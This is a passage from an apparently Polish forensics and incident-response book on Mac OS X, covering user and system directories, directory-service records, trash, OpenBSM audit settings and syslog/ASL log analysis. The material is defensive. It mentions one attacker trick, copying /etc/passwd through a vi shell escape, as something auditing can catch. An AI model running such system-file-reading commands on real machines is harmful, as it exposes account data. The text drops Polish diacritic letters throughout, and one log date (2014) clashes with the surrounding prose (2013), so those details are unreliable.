(/System/Library), ustawienia wsplne uytkownikw (/Library) oraz ustawienia indywidualne
uytkownikw (/Users/nazwautykownika/Library). Naley o tym pamita podczas rozszyfrowywania
konfiguracji programu. W tabeli na nastpnej stronie wypisano podkatalogi, ktre czsto zawieraj
istotne informacje.
Na uwag zasuguje take wiele innych katalogw zwaszcza wtedy, gdy rozpoczyna si analiz
systemu pod ktem zada startowych. Wrcimy jeszcze do nich po omwieniu tematw
interesujcych analityka podczas reakcji na incydent.
Uwaga Aplikacje mog korzysta z katalogw buforowych i pomocniczych w dowolny sposb, chocia mona
wyrni kilka charakterystycznych typw plikw, ktrych uywaj prawie wszystkie programy.
Wszechobecne s pliki plist i bazy danych SQLite. Cho moliwoci s due, do przegldania danych
w tych formatach najczciej uywamy tylko trzech programw. Bazy danych z reguy otwieramy
we wtyczce SQLite Manager do przegldarki Firefox, a do otwierania plikw plist najczciej
wykorzystujemy program plutil (Max OS X) lub pslist Explorer (Windows).
Domena systemowa
Domena systemowa na pierwszy rzut oka moe si wydawa fascynujca. Zawiera wszystkie
tradycyjne uniksowe cieki i dzienniki systemu Mac OS X dotyczce aplikacji, wic w niektrych
przypadkach cae ledztwo mona oprze tylko na odkryciach poczynionych w tym miejscu.
Struktura katalogu /System jest bardzo podobna do struktury folderu /Library. Znajduje si w nim
wiele miejsc, w ktrych aplikacje mog zapisywa dane. Opisujemy je dalej, ale ju w tym miejscu
warto nadmieni, e do tworzenia i modyfikowania plikw w domenie systemowej potrzebne s
uprawnienia administratora.
W domenie systemowej znajduje si wiele doskonaych rde materiau dowodowego.
Tradycyjne katalogi do przechowywania plikw binarnych i bibliotek aplikacji zawieraj dane,
ktre z reguy nie rni si midzy rnymi instalacjami tej samej wersji systemu operacyjnego.
Wyjtkiem jest sytuacja, gdy zaawansowany uytkownik rcznie skompiluje jakie narzdzia albo
uyje dystrybucji MacPorts lub Fink najczciej instalowanych w katalogu /opt. Pord licznych
artefaktw mona znale m.in. dzienniki systemowe w katalogu /var/log, bazy danych w katalogu
/var/db, rejestr drukowanych danych w katalogu dziennikw CUPS oraz obraz upienia systemu.
cieka Opis
/Library/Application Support Katalog, w ktrym aplikacje przechowuj ustawienia, bufory,
/User/nazwauytkownika/ informacje o licencjach i prawie wszystko, co moe by potrzebne
Library/Application Support programicie. Korzystaj z niego aplikacje firmy Apple, cho nie
wszystkie. Przykadowo wikszo aplikacji Apple przechowuje
zasoby w systemowym katalogu Library w podkatalogach
Library/Apple/nazwaaplikacji. Do wyjtkw nale
CrashReporter, aplikacje Apple Pro (np. Final Cut) i App Store.
/Library/Caches W katalogu tym aplikacje przechowuj dane tymczasowe, ktre
/System/Library/Caches mog by bardzo przydatne. W rozdziale 14. opisujemy kilka
aplikacji, ktre z niego korzystaj.
/User/nazwauytkownika/
Library/Caches
/Library/Frameworks Ten katalog jest wykorzystywany przez aplikacje, ktre musz
/System/Library/Frameworks przechowywa sterowniki lub aplikacje pomocnicze. Generalnie
folder ten moe zawiera istotne dane tylko wtedy, jeli w systemie
dziaa szkodliwe oprogramowanie albo uytkownik zainstalowa
specjaln aplikacj.
/Library/Keychains W tym katalogu aplikacje przechowuj pliki danych pku kluczy
/System/Library/Keychains uytkownika. W miejscu tym zapisuje hasa i certyfikaty wiele
aplikacji. Aby uzyska do niego dostp, naley zna haso.
/User/nazwauytkownika/
Library/Keychains
/Library/Logs Katalog do przechowywania rnych dziennikw aplikacji.
/User/username/Library/Logs Jest to jeden z najwaniejszych folderw do przejrzenia.
/Library/Preferences W katalogu tym aplikacje przechowuj preferencje, jeli systemowy
/User/nazwauytkownika/ interfejs API ma moliwo zarzdzania nimi. Pliki z danymi s
Library/Preferences zapisywane w formacie plist, co znacznie uatwia ich analizowanie.
Katalog ten mona (bardzo) luno porwna do gazi Software
rejestru systemu Windows.
/Library/Receipts Gdy do systemu dodawana jest aplikacja, aktualizowane s pliki
/User/nazwauytkownika/ znajdujce si w folderze /Library/Receipts. Plik o nazwie
Library/Receipts InstallHistory.plist zawiera informacje o wszystkich aplikacjach
zainstalowanych przy uyciu instalatora systemowego
i mechanizmu aktualizacji.
/Library/WebServer Serwer Apache, zainstalowany w kadym systemie Mac OS X,
jest uruchamiany, gdy uytkownik wcza funkcj udostpniania
danych w internecie (Web Sharing). Folder ten jest katalogiem
gwnym dokumentw tego serwera.
Domena uytkownika
W domenie przechowywana jest wikszo (a moe nawet cao) treci tworzonej przez uytkownika.
W katalogu /Users mona znale po jednym folderze dla kadego konta utworzonego w systemie
oraz katalog wsplny. Gdy zostaje utworzone nowe konto uytkownika, w katalogu uytkownika
powstaj podkatalogi opisane w tabeli 13.2.
Tabela 13.2. Katalogi tworzone w domenie uytkownika
Katalog Opis
Applications W katalogu tym zapisywane s wszystkie aplikacje instalowane przez uytkownika
Desktop Katalog ten przechowuje zawarto pulpitu uytkownika
Documents Domylne miejsce przechowywania treci tworzonej przez uytkownika
Library Dane konfiguracyjne i bufory uytkownika
Movies Pliki wideo uytkownika
Music Pliki muzyczne uytkownika
Pictures Zdjcia i inne grafiki uytkownika
Public Miejsce do przechowywania plikw wsplnych, do ktrego dostp mona uzyska
bez logowania, jeli wczona jest funkcja udostpniania plikw
Sites Miejsce wsplnie uytkowane przez serwer Apache, jeli wczona jest funkcja
udostpniania treci przez sie
.Trash Katalog do przechowywania plikw usunitych przez uytkownika
Z naszego dowiadczenia wynika, e w domenie uytkownika najwicej czasu spdza si na

analizowaniu zawartoci katalogw Library i Documents.
Dalej w tym rozdziale opisujemy kilka rde dowodw i przedstawiamy metody ich analizy.
Wiele z tych rde moe by przydatnych w rnych rodzajach ledztw, nie tylko dotyczcych
wama do komputerw.
Konfiguracja uytkownika i usug

Metody przechowywania i nadzorowania kont uytkownikw zostay znacznie udoskonalone od
czasu pojawienia si pierwszych wersji systemu operacyjnego Mac OS X. W systemach starszych
od Mac OS X 10.5 metody zarzdzania uytkownikami pochodziy z systemu NeXTstep.
Mechanizm o nazwie NetInfo by ciekaw kombinacj technik zarzdzania uytkownikami NIS+
firmy Sun i systemu DNS. Niestety architektura tego demona bya bardzo niedoskonaa, przez
co firma Apple przestawia si na protok LDAP dla zarzdzania przedsibiorstwem i usugi
katalogowe do zarzdzania uytkownikami lokalnymi. Podczas badania napdu statycznego moe to
by pierwsz rzecz, ktr zauwaysz, jeli bdziesz pobiera list autoryzowanych uytkownikw.
Usugi katalogowe nie przechowuj informacji o kontach uytkownikw w tradycyjnych

uniksowych plikach, takich jak /etc/passwd czy /etc/groups. Dane systemu lokalnego s
przechowywane w bazach danych SQLite i binarnych listach wasnoci.
Dowody
Usuga katalogowa zapisuje dane w katalogu /private/var/db/dslocal. W katalogu tym przechowywane
s bazy danych (wzy) systemu lokalnego w wzach /Default. Przegldajc jego zawarto, mona
znale katalogi i pliki plist odpowiadajce wielu opcjom konfiguracyjnym rodowiska Unix.
Oprcz kont i grup uytkownikw, usuga katalogowa nadzoruje te kilka innych elementw
konfiguracyjnych; oto one:
aliases lokalne trasowanie poczty wewntrznej,
computers informacje Kerberos dla systemu lokalnego,
config informacje Kerberos i Share,
network informacje sieci sprzonej,
sharepoints katalogi udostpniane innym systemom poprzez SMB lub AFP.
Ponadto w strukturze katalogw /private/var/db/dslocal znajduje si baza danych SQLite o nazwie
sqlindex. Zapisywane s w niej czasy utworzenia i modyfikacji plikw plist znajdujcych si w strukturze
katalogw oraz dodatkowe informacje na temat relacji wystpujcych midzy danymi.
Co pewien czas zadanie CRON tworzy kopi zapasow tego caego katalogu. Plik tej kopii
zapasowej to /private/var/db/dslocal-backup.xar jest to normalny plik tar gzip.
Analiza
Z danych usugi katalogowej mona si dowiedzie, jakie byy jej ustawienia konfiguracyjne
w czasie tworzenia obrazu, co pomaga w ustaleniu czasu wystpienia pewnych zdarze
konfiguracyjnych. Czasami w trakcie procesu RI trzeba sprawdzi, kiedy zosta utworzony
wybrany udzia albo czy dane konto istniao i miao okrelone uprawnienia. Wszystkie rda
danych z usugi katalogowej mog zawiera istotne informacje.
Konta uytkownikw
W wle users znajduje si po jednym binarnym pliku plist dla kadego konta uytkownika.
Plik ten zazwyczaj zawiera wasnoci opisane w tabeli 13.3. Naley jednak pamita, e kolejno
i obecno poszczeglnych wasnoci zaley od konfiguracji systemu.
Najbardziej przydatne s pola jpegphoto, picture, realname, name, home, generateduid oraz uid.
Dodatkowo w bazie danych sqlindex czasami sprawdzamy tabel rec:users. Warto pola filetime
umoliwia odkrycie oryginalnej daty instalacji i czasu ostatniej modyfikacji rekordu przez uytkownika.
Pola dotyczce fotografii w ledztwach s mao przydatne, cho moesz si zdziwi, jak czsto
zdjcia wykonywane za pomoc wbudowanej kamery s wykorzystywane jako obrazy kont.
Tabela 13.3. Wasnoci uytkownika
jpegphoto Naprivs passwordpolicyoptions

picture _writers_picture hint
shell _writers_realname realname
name _writers_UserCertificate home
KerberosKeys ShadowHashData uid
_writers_passwd LinkedIdentity generateduid
gid Passwd _writers_hint
_writers_jpegphoto
Punkty udostpniania
Wze sharepoints zawiera binarny plik plist dla kadego wsplnego katalogu. Gdy uytkownik wczy
udostpnianie plikw w folderze, system tworzy binarny plik plist zawierajcy trzynacie atrybutw
z informacjami o statusie udziau dla AFP, SMB i FTP, z nazwami punktw udostpniania dla kadej
usugi i ze wspdzielon ciek. Na rysunku 13.7 przedstawiono przykad wasnoci udziau o nazwie
Internal Documents i ciece /Volumes/HR/Payroll/Internal Documents.
RYSUNEK 13.7. Wasnoci definicji punktu udostpniania

Podobnie jak w przypadku wza users, czas utworzenia punktu udostpniania mona
sprawdzi w pliku bazy danych sqlindex. Na rysunku 13.8 wida t wanie informacj.
Warto 1382822698 oznacza sobot, 26 padziernika 2013 roku, 21:24:58 GMT.
RYSUNEK 13.8. Czas utworzenia punktu udostpniania
Kosz i pliki usunite

Tak jak w systemach Linux i Windows, w systemie Mac OS X pliki usuwane przez graficzny
interfejs uytkownika przed ostatecznym skasowaniem s przenoszone do folderu tymczasowego.
Mac OS X zapisuje pliki oznaczone do usunicia w trzech rnych miejscach, a wybr jednego
z nich zaley od lokalizacji oryginau i tego, kto go skasowa; oto te miejsca:
/.Trashes oglny folder kosza woluminu,
~/.Trash folder kosza konkretnego uytkownika,
/private/var/root/.Trash folder kosza uytkownika root.
Dowody
Na woluminach wymiennych, np. napdach USB, folder oglny (przykadowo /Volumes/
USBDRIVE/.Trashes) tworzony jest w chwili zamontowania woluminu. Gdy uytkownik usunie
z tego napdu plik, system Mac OS X utworzy w tym folderze katalog dla identyfikatora tego
uytkownika (np. /Volumes/USBDRIVE/.Trashes/501, jeli uytkownik ma identyfikator 501).
W folderze tym zapisywane s kopie wszystkich plikw usunitych przez uytkownika
o okrelonym identyfikatorze.
Inspekcja systemu, bazy danych i dzienniki

Firma Apple od samego pocztku istnienia szczeglny nacisk kadzie na to, by wytwarzane przez
ni rodowiska i ekosystem byy jak najwygodniejsze dla uytkownika. Przyjta zasada w duym
stopniu wpywa na podejmowane przez firm decyzje dotyczce projektowania programw, co jest
korzystne dla nas jako informatykw ledczych. Wiele demonw, ktrych zadaniem jest dbanie
o to, by wszystko dziaao, prowadzi szczegowe dzienniki i bazy danych. wietnych rde
artefaktw jest tak duo, e bez problemu mona by napisa o nich oddzieln ksik. Przydatno
wielu z nich jest najwiksza wtedy, gdy ledztwo koncentruje si na dziaaniach uytkownika,
mniejsza za w ledztwach w sprawie wama. Z wymienionych powodw skupilimy si tu przede
wszystkim na przedstawieniu iloci i rodzaju danych, jakie mona zdoby do analizy.
Inspekcja systemu i bazy danych

System operacyjny Mac OS X zawiera potny podsystem inspekcji o nazwie Open Source Basic
Security Module (OpenBSM). Rejestruje on zdarzenia dostpu do plikw, przychodzce i wychodzce
poczenia sieciowe oraz zdarzenia uruchamiania aplikacji wraz z ich opcjami wiersza polece.
Niestety przy domylnych ustawieniach podsystem OpenBSM nie zapisuje szczegowych informacji,
przez co jego przydatno w procesie RI jest mocno ograniczona. Zawarto dziennikw OpenBSM
mona wywietli za pomoc polecenia praudit. OpenBSM to pakiet dostpny dla wielu platform,
wic mona wyeksportowa dane z utworzonego na potrzeby ledztwa obrazu dysku z systemem
Mac OS X, a nastpnie przeanalizowa je za pomoc polecenia praudit w komputerze z systemem
Linux, jeli kto woli wanie to rodowisko. Inn moliwoci jest uycie macierzystego narzdzia
systemu Mac OS X o nazwie Audit Explorer, ktre mona pobra z App Store. Aplikacja ta przetwarza
pliki zwracane przez OpenBSM i uatwia analiz ich zawartoci.
Pliki konfiguracyjne systemu OpenBSM znajduj si w katalogu /etc/security. W gwnym pliku,
o nazwie audit_control, zapisane jest, e dzienniki s przechowywane w folderze /private/var/audit.
Podczas analizy systemu na ywo naley pobra ten folder w caoci. Nazwa kadego pliku dziennika
okrela, z jakiego czasu pochodzi rejestr zdarze.
Uwaga Wicej informacji o projekcie OpenBSM mona znale na stronie

http://www.trustedbsd.org/openbsm.html.
Istnieje moliwo zwikszenia dokadnoci danych rejestrowanych przez auditd przed wystpieniem
incydentu. W tym celu naley wprowadzi ponisze zmiany w pliku konfiguracyjnym auditd
/etc/security/audit_control, a nastpnie ponownie uruchomi komputer:
flags:all
naflags:lo,aa,pc,nt
policy:cnt,argv
filesz:1G
expire-after:10G
Ustawienia te spowoduj rejestrowanie wszystkiego dla wszystkich uytkownikw oraz zdarze

logowania i wylogowania, zdarze administracyjnych, procesw i aktywnoci sieciowej procesw,
ktrych nie mona przypisa konkretnemu uytkownikowi. Jeeli potrzebne s dodatkowe
szczegy, mona sprawi, e narzdzie bdzie zachowywa zmienne rodowisk dla kadego
procesu. Naley jednak wiedzie, e spowoduje to znaczne zwikszenie objtoci dziennikw.
Najbardziej przekonujcy powd do wczenia tych opcji przedstawiono na rysunku 13.9.
Jest to okno narzdzia Audit Explorer z wykazem wszystkich polece wykonanych podczas
krtkiej sesji SSH. Jak wida, wczenie kompletnej inspekcji znacznie uatwia odtworzenie
poczyna hakera.
RYSUNEK 13.9. Inspekcja aktywnoci w powoce
W ten sposb da si wykry nawet aktywno ukryt za pomoc starej sztuczki polegajcej
na wykorzystaniu do uruchamiania kodu aplikacji vi. Na rysunku 13.10 wida, e z poleceniem !
edytora vi kto wykona polecenie cp /etc/passwd ~. Zwr uwag, e PID rodzica to vim.
System Mac OS X zawiera wiele usug pomocniczych dziaajcych w tle. Usugi te wspomagaj
system i aplikacje uytkownika, nadzorujc zdarzenia i wsplne dane. Wikszo aplikacji pomocniczych
zapisuje informacje o stanie w plikach bazy danych SQLite i plikach list wasnoci. W kadej chwili
liczba uruchomionych usug systemowych moe przekroczy czterdzieci niezalenych procesw.
Niektre z nich s dla nas interesujce, poniewa peni wan funkcj lub zapewniaj usugi
pomocnicze dla innych aplikacji. Oto kilka przykadw tych usug pomocniczych:
airportd zarzdza poczeniami z sieciami bezprzewodowymi,
aosnotifyd demon usugi Znajd mj Mac,
pboard systemowa tablica nadzorujca operacje kopiowania, wycinania i wklejania,
sharingd zarzdza udostpnianiem danych i napdw innym systemom,
spindump_agent wspomaga monitor Spindump oraz raportowanie bdw i zawiesze
aplikacji.
RYSUNEK 13.10. Polecenia wykonane w powoce
Niektre z tych usug zapisuj dane, ktre mog by przydatne w pewnych rodzajach ledztw.
Wemy np. informacje zapisywane przez usug airportd.
Wiele usug, wcznie z airportd, dziaa w piaskownicy, wic wymaga do tego celu odpowiedniego
profilu. W informacjach tych moemy odkry rne miejsca przechowywania danych wykorzystywane
przez aplikacj. Firma Apple zapisuje pliki konfiguracyjne aplikacji dziaajcych w piaskownicy
w katalogu /usr/share/sandbox. Poniej pokazano fragment kodu konfiguracyjnego usugi airportd:
(allow file*
(literal "/dev/io8log")
(literal "/dev/io8logmt")
(literal "/dev/io8logtemp")
(regex #"^/dev/pf")
(regex #"^/dev/bpf")
(regex #"^/Library/Preferences/SystemConfiguration/preferences\.plist")
(regex #"^/Library/Preferences/SystemConfiguration/com\
.apple\.airport\.preferences\.plist")
(regex #"^/Library/Preferences/SystemConfiguration/com\
.apple\.wifi\.message-tracer\.plist")
)
Wywietlimy zawarto pliku /Library/Preferences/SystemConfiguration/

com.apple.airport.preferences.plist za pomoc polecenia plutil:
bash-3.2# plutil -p /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
Ze zwrconych danych wynika, e w pliku tym usuga airportd przechowuje list punktw
dostpowych i sieci, z ktrymi si czy. Przykadowe wyniki pokazalimy dalej w ramach
opisywanego zdarzenia.
Dzienniki systemu i aplikacji

Jak w przypadku wszystkich funkcji zaczerpnitych z Uniksa, take w kwestii prowadzenia
dziennikw i aplikacji firma Apple pozwolia sobie na spore odstpstwa od oryginau.
Podczas analizowania zawartoci (take na ywo) systemu Mac OS X naley sprawdzi kilka
miejsc, w ktrych mog znajdowa si istotne informacje.
W komputerach z systemem Mac OS X wiele dziennikw i artefaktw mona znale
w katalogach wymienionych poniej (/var/log jest czem symbolicznym do /private/var/log):
/private/var/log,
/Library/Logs,
/Users/nazwauytkownika/Library/Logs,
/Users/nazwauytkownika.
Ostatni punkt tej listy dotyczy ukrytych dziennikw prowadzonych przez aplikacje
konsolowe. Katalog gwny uytkownika zawiera dane historyczne dotyczce powoki, histori
MySQL oraz inne dzienniki z danymi sesji. Wikszo plikw jest w zwykym formacie tekstowym,
wic mona je analizowa na wiele sposobw, np. za pomoc narzdzi cat, less, grep, edytorw
tekstowych, Highlightera oraz w specjalnych programach do analizy dziennikw, takich jak
Sawmill czy Logstash. Pliki zapisane w formacie binarnym, np. przez ASL (ang. Apple System Log)
lub auditd, naley przekonwertowa na posta czyteln dla czowieka. Szerzej na ten temat piszemy
w podpunkcie Analiza.
Dowody
Demony syslog i ASL to procesy odpowiedzialne za wikszo danych znajdujcych si w dziennikach
w systemie Mac OS X. Najwicej informacji dziennikowych mona znale w katalogu /private/var/log,
wic zaczniemy od niego.
Jeli kto korzysta z narzdzi obsugi dziennikw w nowoczesnych dystrybucjach Linuksa,
z pewnoci rozpozna wiele z opisywanych tu plikw, cho oczywicie s wrd nich take pliki
charakterystyczne tylko dla systemu Mac OS X. W trakcie prowadzenia czynnoci ledczych
w systemach uniksowych jednym z pierwszych plikw, jakie badamy, jest plik konfiguracyjny syslog.
W pliku tym okrelone jest miejsce zapisu lub przekierowania wiadomoci przez demony obsugujce
syslog. Firma Apple dodaa jeszcze jedn warstw o nazwie ASL (ang. Apple System Log). Plik
konfiguracyjny usugi ASL zawiera informacje, ktre tradycyjnie definiuje si w pliku /etc/syslog.conf.
Zgodnie z domylnymi ustawieniami pliku konfiguracyjnego przedstawionymi poniej, wikszo

wiadomoci trafia do pliku o nazwie system.log. Szczeglnie interesujce s dwa elementy, auth
i authpriv. Zawieraj one wiadomoci dotyczce wszystkich zdarze logowania w systemie.
##
# configuration file for syslogd and aslmanager
##
# authpriv messages are root/admin readable

? [= Facility authpriv] access 0 80
# remoteauth critical, alert, and emergency messages are root/admin readable

? [= Facility remoteauth] [<= Level critical] access 0 80
# broadcast emergency messages

? [= Level emergency] broadcast
# save kernel [PID 0] and launchd [PID 1] messages

? [<= PID 1] store
# ignore "internal" facility

? [= Facility internal] ignore
# save everything from emergency to notice

? [<= Level notice] store
# Rules for /var/log/system.log

> system.log mode=0640 format=bsd rotate=seq compress file_max=5M all_max=50M
? [= Sender kernel] file system.log
? [<= Level notice] file system.log
? [= Facility auth] [<= Level info] file system.log
? [= Facility authpriv] [<= Level info] file system.log
# Facility com.apple.alf.logging gets saved in appfirewall.log

? [= Facility com.apple.alf.logging] file appfirewall.log file_max=5M all_max=50M
Usuga ASL zapewnia aplikacjom dziaajcym w systemie Mac OS X take dodatkowe funkcje,
ktre umoliwiaj skuteczniejsze przechowywanie i obsugiwanie dziennikw. Normalne
komunikaty syslog maj prost struktur:
czas nadejcia wiadomoci do demona syslog,
rdo wiadomoci,
wano i typ wiadomoci,
tre wiadomoci.
Usuga ASL jest bardziej elastyczna. Gdy programista przesya dzienniki przez t usug, moe
oprcz standardowych pl syslog zdefiniowa wasne pary klucz-warto. W parach tych mona
zapisa cza do plikw zewntrznych, okreli uytkownikw lub identyfikatory grup, ktre powinny
otrzyma dan wiadomo, oraz ustawi czas wyganicia wiadomoci. W opublikowanych niedawno
dokumentach firma Apple zasugerowaa, aby programici zaczli uywa w wiadomociach hasztagw,
ktre pomagaj w przeszukiwaniu dziennikw. Wrd zalecanych znacznikw znalazy si m.in.

#System, #Attention, #Security oraz #Error. To spora zmiana w stosunku do starych technik
prowadzenia dziennikw systemowych.
Usuga ASL zapisuje dane w katalogu /private/var/log/asl. Pliki te nie s w zwykym formacie
tekstowym, wic do wywietlenia ich zawartoci potrzebne jest polecenie syslog. Aby obejrze
jeden plik, naley posuy si poleceniem w sposb podany niej. Jeli natomiast trzeba
przekonwertowa wszystkie pliki z wybranego katalogu, trzeba uy znacznika -d zamiast -f.
planck:~ user$ sudo syslog -f /private/var/log/asl/<plik>.asl
Wyrnia si trzy formaty plikw dziennikw ASL. Pierwszy dotyczy zdarze zwizanych
z konkretnymi uytkownikami lub grupami. Pierwsza cz nazwy takich plikw jest dat, a druga
reprezentuje pochodzenie zdarze. Oto przykad:
2013.11.09.U501.asl ten plik zawiera informacje o zdarzeniach dla UID 501 z 9 listopada
2013 roku,
2013.11.09.G80.asl ten plik zawiera informacje o zdarzeniach dla GID 80 z dnia
9 listopada 2013 roku,
2013.11.09.U0.G80.asl ten plik zawiera informacje o zdarzeniach dla UID 0, GID
80 z dnia 9 listopada 2013 roku. Wrd zdarze tych mog znajdowa si czynnoci
wykonywane w kontekcie sudo, poniewa GID 80 to admin. Po obejrzeniu nazw plikw
porwnaj je z zawartoci katalogw /etc/passwd i /etc/group, aby je odpowiednio powiza.
Na pocztku nazwy drugiego formatu znajduj si litery BB. Data zazwyczaj oznacza rok
naprzd. Wpisy w tych plikach, z reguy dotyczce zdarze uwierzytelniania, s przeznaczone
do przechowywania przez dugi czas.
Ostatnia konwencja nazewnicza wykorzystywana w tym katalogu rozpoczyna si od acucha
AUX. S to katalogi zawierajce dane historyczne pozwalajce dowiedzie si, jak doszo do awarii
lub nienormalnego zamknicia aplikacji. S to zwyke pliki tekstowe, wic do ich analizy nie trzeba
wspominanego wczeniej polecenia syslog.
Analiza
Analiza danych syslog i ASL z systemu Mac OS X jest atwa. Wikszo dziennikw jest w formacie
tekstowym, wic jako analityk masz szerokie pole dziaania. W zalenoci od objtoci danych i ich
formatu, do analizy wykorzystujemy rne narzdzia uniksowe, np. cat, grep czy awk. Czasami
najlepszym rozwizaniem jest zaimportowanie danych do arkusza kalkulacyjnego. Ponadto, jeli
dzienniki s due, a chcemy obejrze dzienniki w kilku rnych formatach naraz, moemy
zaimportowa dane do narzdzia zarzdzania dziennikami, takiego jak np. Sawmill, Splunk
lub Logstash. Wszystkie zawieraj funkcje przeksztacania danych i wyszukiwarki.
W INTERNECIE
Logstash www.logstash.net
Sawmill www.sawmill.net
Splunk www.splunk.com
Dzienniki systemowe w systemie Mac OS X zawieraj ogromne iloci danych pochodzcych

od wszystkich demonw i aplikacji. Trudno nawet wymieni wszystkie typy danych, jakie mona
w tych dziennikach znale, wic przedstawiamy tylko kilka fragmentw z wasnych dziennikw,
aby pokaza, co znajduje si w tych plikach.
Dzienniki inspekcji procesu OpenBSM s przechowywane w katalogu /private/var/audit.
Mona tam znale informacje o wszystkich zdarzeniach logowania zapisane w formacie bez
kodowania ASCII. Projekt OpenBSM jest dostpny na wielu platformach, wic do analizy mona
uywa komputera z systemem Linux lub BSD. Aby wydoby z plikw dane w czytelnym formacie,
naley uy narzdzia praudit. W poniszym przykadzie narzdzie to zostao uyte do wydobycia
informacji o uwierzytelnianiu. Ukazane s trzy zdarzenia, kady rekord zaczyna si od sowa
header i koczy si sowem trailer oraz liczb okrelajc cakowit dugo wpisu. W przykadzie
tym wybralimy prosty format danych, ale dla niektrych atwiejszy do analizy moe by format
XML, poniewa zawiera etykiety.
Pokazane fragmenty zostay wygenerowane za pomoc polecenia praudit -s [nazwapliku].
Rcznie poszukalimy zdarze uwierzytelniania. Znacznik -s sprawia, e wyniki s atwe do
wydrukowania, ale brak w nich opisw pl. Jeli potrzebujesz nazw pl, moesz uy formatu
XML, ktry wcza si za pomoc opcji -x.
header,326,11,AUE_ssauthorize,0,Sat Nov 9 20:27:45 2014, + 134 msec
subject,user,user,staff,user,staff,27748,100005,27749,0.0.0.0
text,system.preferences
text,client /System/Library/PrivateFrameworks/
SystemAdministration.framework/XPCServices/writeconfig.xpc
text,creator /System/Library/PreferencePanes/
SharingPref.prefPane/Contents/XPCServices/
com.apple.preferences.sharing.remoteservice.xpc
return,success,0
trailer,326

subject,-1,root,wheel,root,wheel,27471,100000,27472,0.0.0.0
text,begin evaluation
return,success,0
trailer,88

subject,-1,root,wheel,root,wheel,27471,100000,27472,0.0.0.0
text,com.apple.ServiceManagement.daemons.modify
text,client /usr/libexec/launchdadd
text,creator /System/Library/PrivateFrameworks/
SystemAdministration.framework/XPCServices/writeconfig.xpc
return,success,0
Z pierwszego rekordu wynika, e 9 listopada 2013 roku, w niedziel o godzinie 20:27

uytkownik o nazwie user otworzy okienko Sharing w preferencjach systemu. Z daty i godziny
pliku (niepokazane) moemy si dowiedzie, kiedy zostay zarejestrowane wpisy w dzienniku.
Drugi rekord dotyczy zdarzenia typu AUE_ssauthorize, czyli udanego uwierzytelniania, podobnego
do su root, umoliwiajcego normalnemu uytkownikowi wprowadzanie zmian. Trzeci rekord
informuje, e zmiana zostaa wprowadzona pomylnie. Niestety z dziennika tego nie da si

wywnioskowa, jaka wasno zostaa zmieniona.
Mniej wicej trzy minuty pniej zarejestrowano nastpujce zdarzenie. Uytkownik o tym
samym identyfikatorze zalogowa si w systemie za pomoc SSH, wic zosta zarejestrowany typ
zdarzenia AUE_openssh.
header,110,11,AUE_openssh,0,Sat Nov 9 20:31:29 2014, + 759 msec
subject_ex,user,user,staff,user,staff,27775,27775,56091,::1
text,successful login user
return,success,0
trailer,110
Nastpny przykad to wycig z dziennika /private/var/log/system.log, ktry zosta

wygenerowany po tym, jak kto odczy przewd internetowy od komputera MacBook Pro:
Jan 23 20:08:24 planck kernel[0]: AppleBCM5701Ethernet [en0]:
Link down (womp disabled, proxy idle)
Jan 23 20:08:25 planck.local configd[17]: setting hostname to "planck.local"
Jan 23 20:08:26 planck.local configd[17]: network changed:
v4(en0-:10.1.4.105) DNS- Proxy- SMB
Jan 23 20:08:26 planck.local netbiosd[11488]: network_reachability_changed:
network is not reachable, netbiosd is shutting down
Jan 23 20:08:26 planck.local com.apple.iCloudHelper[14236]:
AOSKit ERROR: Config request failed,
url=https://setup.icloud.com/configurations/init, requestHeaders=
{
"Accept-Language" = "en-us";
"X-Mme-Client-Info" = "<MacBookPro8,2> <Mac Mac OS X;10.9.2;13C64>
<com.apple.AOSKit/176>";
"X-Mme-Country" = US;
"X-Mme-Nac-Version" = 11A457;
"X-Mme-Timezone" = EDT;
},
error=Error Domain=kCFErrorDomainCFNetwork Code=-1009 "The Internet
connection appears to be offline." UserInfo=0x092e027fa09b
{NSErrorFailingURLStringKey=https://setup.icloud.com/configurations/
init, NSLocalizedDescription=The Internet connection appears to be
offline., NSErrorFailingURLKey=https://setup.icloud.com/
configurations/init}, httpStatusCode=-1, responseHeaders=
(null)
Jan 23 20:08:41 planck.local AddressBookSourceSync[14238]:
tcp_connection_destination_prepare_complete 1 connectx to
10.1.4.4#443 failed: 51 - Network is unreachable
Przyjrzymy si tym wpisom i zobaczymy, jakie informacje mona z nich wydoby. W pierwszej
linijce znajduje si powiadomienie z jdra, e interfejs przesta dziaa. Zdarzenie to spowodowao
kaskad innych zdarze, z ktrych pierwsze to aktualizacja konfiguracji sieci systemowej. Nazwa
domeny hosta zostaa zmieniona na .local przez proces o nazwie configd. Pniej ten sam proces
zapisa w dzienniku wydany przez siebie adres (10.1.4.105) oraz zanotowa, e usugi DNS, Proxy
i SMB (funkcja udostpniania plikw Samba) zostay dezaktywowane (zwr uwag na znak
minus w danych). Jeden z demonw odpowiedzialnych za cz protokou SMB netbiosd zgasza
zakoczenie dziaania. W pitej linijce proces iCloudHelper informuje, e nie udao si speni
dania konfiguracji. Dowiadujemy si, e istnieje konto iCloud powizane z systemem, cho do
tej pory i tak pewnie bymy o tym ju wiedzieli. Kolejnym wanym spostrzeeniem jest to, e wiele
usug i aplikacji wysya do syslog informacj o biecej wersji systemu operacyjnego. Moe to by
bardzo cenna informacja, gdy istnieje podejrzenie, e gwny uytkownik prbowa zmieni dane
w dzienniku lub sam system operacyjny. W kocu w ostatniej linijce znajdujemy informacj, e
proces AddressBookSourceSync nie mg poczy si z adresem 10.1.4.4. Jest to kolejny trop mogcy
wskazywa, e dane uytkownika mog znajdowa si na zdalnych serwerach.
Chwil pniej do dziennika systemowego zostay wysane nastpujce wiadomoci:
Jan 23 20:09:16 planck.local KernelEventAgent[99]: tid 54485244
received event(s) VQ_DEAD (32)
type 'afpfs', mounted on '/Volumes/TMBackup', from
'//TimeMachine@nas0%28TimeMachine%29._afpovertcp._tcp.local/TMBackup',
dead
force unmount
//TimeMachine@nas0%28TimeMachine%29._afpovertcp._tcp.local/TMBackup
from /Volumes/TMBackup
found 1 filesystem(s) with problem(s)
Mamy tu kolejny trop. Okazuje si, e system ten wykorzystuje zdalny dysk do przechowywania
kopii zapasowych tworzonych przez program Time Machine. System by poczony za pomoc
protokou AFP (ang. Apple File Protocol) z punktem montau (ang. TimeMachine) w systemie
o nazwie nas0. Jeli przeszukujesz nieznany obszar roboczy, teraz powiniene poszuka w lokalnej
sieci LAN sieciowych urzdze magazynowych o nazwie nas0.
Po podczeniu kabla sieciowego z powrotem do komputera usugi wczaj si i nastpuje
